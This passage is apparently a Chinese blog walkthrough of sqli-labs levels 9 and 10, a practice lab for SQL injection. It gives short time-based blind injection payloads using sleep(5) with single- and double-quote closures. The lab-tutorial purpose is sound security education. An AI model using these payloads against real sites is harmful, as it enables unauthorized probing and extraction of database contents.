<h2 id="第九关：Blind-Time-based-Single-Quotes-String"><a href="#第九关：Blind-Time-based-Single-Quotes-String" class="headerlink" title="第九关：Blind- Time based- Single Quotes- String"></a>第九关：Blind- Time based- Single Quotes- String</h2><p>这里我们尝试使用单引号和双引号闭合，发现页面回显一直正常，说明该关卡可能将我们的单双引号给退意了。<br><img src="https://img-blog.csdnimg.cn/20201027122605969.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br> 但是我输入%df之后页面回显依然正常，这个时候我觉得应该是无论我输入什么页面回显都是一样的。所以我尝试使用sleep()函数来测试，经过多次尝试，这里是单引号闭合的时间注入<br>‘ and sleep(5) </p>
<h2 id="第十关-Time-based-Double-Quotes-String"><a href="#第十关-Time-based-Double-Quotes-String" class="headerlink" title="第十关:Time based- Double Quotes- String"></a>第十关:Time based- Double Quotes- String</h2><p> 基于双引号的时间注入<br>?id=2” and sleep(5) –+<br>这里我就不在一个一个字母的去测试了，大家了解一下时间盲注就好 </p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/sqli-labs/" rel="tag"># sqli-labs</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/10/17/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8Cweb%E8%BF%9B%E9%98%B6%E5%8C%BA%E4%B9%8Bupload1/" rel="prev" title="攻防世界web进阶区之upload1">
      <i class="fa fa-chevron-left"></i> 攻防世界web进阶区之upload1
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/10/19/sqli-labs%20Less%2011~20%20%E9%80%9A%E5%85%B3%E8%AF%A6%E8%A7%A3/" rel="next" title="sqli-labs 11~20关通关教程">
      sqli-labs 11~20关通关教程 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AC%AC%E4%BA%94%E5%85%B3%EF%BC%9ADouble-Query-Single-Quotes-String"><span class="nav-number">1.</span> <span class="nav-text">第五关：Double Query- Single Quotes- String</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AC%AC%E5%85%AD%E5%85%B3-Double-Query-Double-Quotes-String"><span class="nav-number">2.</span> <span class="nav-text">第六关:Double Query- Double Quotes- String</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AC%AC%E4%B8%83%E5%85%B3%EF%BC%9ALess-7-Dump-into-Outfile"><span class="nav-number">3.</span> <span class="nav-text">第七关：Less-7 Dump into Outfile</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AC%AC%E5%85%AB%E5%85%B3-Blind-Boolian-Single-Quotes-String"><span class="nav-number">4.</span> <span class="nav-text">第八关: Blind- Boolian- Single Quotes- String</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AC%AC%E4%B9%9D%E5%85%B3%EF%BC%9ABlind-Time-based-Single-Quotes-String"><span class="nav-number">5.</span> <span class="nav-text">第九关：Blind- Time based- Single Quotes- String</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AC%AC%E5%8D%81%E5%85%B3-Time-based-Double-Quotes-String"><span class="nav-number">6.</span> <span class="nav-text">第十关:Time based- Double Quotes- String</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">blank-admure</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">12</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2020.10.06 – 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">blank-admure</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>


    <script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>


        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>


  <script defer src="/lib/three/three.min.js"></script>
    <script defer src="/lib/three/three-waves.min.js"></script>


  















  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : false,
      notify     : false,
      appId      : 'L9pqya1Hhf0bHAFvfr26BFun-gzGzoHsz',
      appKey     : 'WMnNAV2J6llhDQ2y4HtABX0E',
      placeholder: "Just go go",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : false,
      lang       : 'zh-cn' || 'zh-cn',
      path       : location.pathname,
      recordIP   : false,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

  <!-- 引入jQuery -->
<script type="text/javascript" src="//libs.baidu.com/jquery/1.8.3/jquery.min.js"></script>
  <!-- 雪花特效 -->
<script type="text/javascript" src="/js/snow.js"></script>
<script type="text/javascript" src="/js/love.js"></script>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"model":{"jsonPath":"/live2dw/assets/haruto.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true},"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
